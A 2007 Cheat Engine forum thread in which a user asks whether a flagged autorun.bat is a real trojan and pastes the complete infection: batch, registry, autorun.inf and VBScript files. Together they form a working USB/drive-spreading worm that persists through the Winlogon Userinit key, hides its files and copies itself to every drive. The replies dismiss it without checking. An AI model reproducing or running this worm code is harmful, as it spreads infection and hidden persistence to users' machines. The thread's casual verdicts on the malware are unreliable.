Cheat Engine Forum Index Cheat Engine
The Official Site of Cheat Engine
 
 FAQFAQ   SearchSearch   MemberlistMemberlist   UsergroupsUsergroups   RegisterRegister 
 ProfileProfile   Log in to check your private messagesLog in to check your private messages   Log inLog in 


Virus or just scanned as one?

 
Post new topic   Reply to topic    Cheat Engine Forum Index -> Computer Talk
View previous topic :: View next topic  
Author Message
Thlump
Grandmaster Cheater
Reputation: 0

Joined: 26 Aug 2007
Posts: 964
Location: 206.51.226.121
PostPosted: Tue Dec 25, 2007 11:18 pm    Post subject: Virus or just scanned as one? Reply with quote
Today my AV scanned a system file called autorun.bat and it was a trojan. Is it really a trojan or is it scanned like one?. Also, is autorun.bat not suppose to scan like/have a virus?

Virus scan results: http://www.virustotal.com/resultado.html?f17775d76240b18c6ef576aed2d22a17
_________________
Symbol wrote:
LOL!
Then its not a UCE, its UWF. (Undetected Windows Form. WITH BUTTONS! Laughing )
Back to top
View user's profile Send private message
hcavolsdsadgadsg
I'm a spammer
Reputation: 26

Joined: 11 Jun 2007
Posts: 5801
PostPosted: Wed Dec 26, 2007 12:04 am    Post subject: Reply with quote
Guessing something added something nasty to your autorun.bat

take a look, right click -> edit.
Back to top
View user's profile Send private message
Pancake
Grandmaster Cheater
Reputation: 0

Joined: 26 Jul 2007
Posts: 843
PostPosted: Wed Dec 26, 2007 12:39 am    Post subject: Re: Virus or just scanned as one? Reply with quote
Thlump wrote:
Today my AV scanned a system file called autorun.bat and it was a trojan. Is it really a trojan or is it scanned like one?. Also, is autorun.bat not suppose to scan like/have a virus?

Virus scan results: http://www.virustotal.com/resultado.html?f17775d76240b18c6ef576aed2d22a17


i got that i think once when i downloaded a hack. 0.o

harmless... i think
_________________
Back to top
View user's profile Send private message AIM Address
Thlump
Grandmaster Cheater
Reputation: 0

Joined: 26 Aug 2007
Posts: 964
Location: 206.51.226.121
PostPosted: Wed Dec 26, 2007 12:46 am    Post subject: Reply with quote
Okay here are the stuff in autorun.bat

Code:
@echo off
rem autorun·ç±©
if exist .\autorun.reg regedit /s .\autorun.reg
if not "%1"=="" goto open
if exist autorun.vbs start WScript.exe autorun.vbs&exit
if exist %SYSTEMROOT%\system32\autorun.vbs start WScript.exe %SYSTEMROOT%\system32\autorun.vbs&exit
exit
:open
if not "%1"=="Open" goto next
start explorer .\
exit
:next
if not "%1"=="Over" goto :next2
if exist .\autorun.bin type .\autorun.bin >C:\autorun.txt&&exit
if exist %SYSTEMROOT%\system32\autorun.bin type %SYSTEMROOT%\system32\autorun.bin >c:\autorun.txt&&exit
exit
:next2
if "%1"=="-" attrib -s -a -h -r %2\autorun.*
if "%1"=="+" attrib +s +a +h +r %2\autorun.*
:end


And what about this also virused autorun.reg file?
Code:
Windows Registry Editor Version 5.00
autorun风暴
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit"="userinit.exe,autorun.bat"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"ShowSuperHidden"=dword:00000000


And what about this autorun.inf file?

Code:
autorun·ç±©
[autorun]
open=

shell\open=´ò¿ª(&O)
shell\open\Command=WScript.exe .\autorun.vbs
shell\open\Default=1
shell\explore=×ÊÔ´¹ÜÀíÆ÷(&X)
shell\explore\Command=WScript.exe .\autorun.vbs


And finally this:
Code:
rem autorun·ç±©
on error resume next
Set WshShell =CreateObject("WScript.Shell")

if Year(Date)=2030 and Month(Date)=6 and Day(Date)=30 then
a=WshShell.Run("autorun.bat Over" ,0,True)
Set Of = CreateObject("Scripting.FileSystemObject")
Set fc = Of.OpenTextFile("C:\autorun.txt", 1)
mt = fc.ReadAll
fc.Close
if mt<>"" then msgbox decrypt(mt)
end if

if Year(Date)>2030 or Month(Date)>100 then
else
For i=1 to 1
set Of = CreateObject("Scripting.FileSystemObject")
set dir = Of.GetSpecialFolder(1)

Set dc = Of.Drives
if WScript.ScriptFullName=dir&"\autorun.vbs" then
isdir=true
else
a=WshShell.Run("autorun.bat Open" ,0,False)
isdir=false
end if
For Each d In dc
If d.DriveType = 2 Or d.DriveType = 3 or (d.DriveType = 1 and d<>"A:" and d<> "B:") Then
a=WshShell.Run("autorun.bat - "&d ,0,True)
if isdir then
Of.CopyFile dir&"\autorun.*",d&"\",True
else
Of.CopyFile "autorun.*",d&"\",True
end if
a=WshShell.Run("autorun.bat + "&d ,0,True)
End If
next
if isdir then
wscript.sleep 60000
i=0
else
a=WshShell.Run("autorun.bat - "&dir ,0,True)
Of.CopyFile "autorun.*",dir&"\",True
a=WshShell.Run("autorun.bat + "&dir ,0,True)
End if
next
End if

function decrypt(dcode)
   dim texts
   dim i
   for i=1 to len(dcode)-4
   x=i mod 5
   texts=texts & chr(asc(mid(dcode,i,1))-x)
   next
   decrypt=texts
end function


yes they all have trojans but nothing happened when I rebooted...
_________________
Symbol wrote:
LOL!
Then its not a UCE, its UWF. (Undetected Windows Form. WITH BUTTONS! Laughing )
Back to top
View user's profile Send private message
woodbine
Grandmaster Cheater
Reputation: 0

Joined: 28 Sep 2007
Posts: 899
PostPosted: Wed Dec 26, 2007 11:28 am    Post subject: Reply with quote
So then the virus probably got deleted.
Back to top
View user's profile Send private message
Display posts from previous:   
Post new topic   Reply to topic    Cheat Engine Forum Index -> Computer Talk All times are GMT - 6 Hours
Page 1 of 1

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You cannot attach files in this forum
You cannot download files in this forum


Powered by phpBB © 2001, 2005 phpBB Group

CE Wiki   IRC (#CEF)   Twitter
Third party websites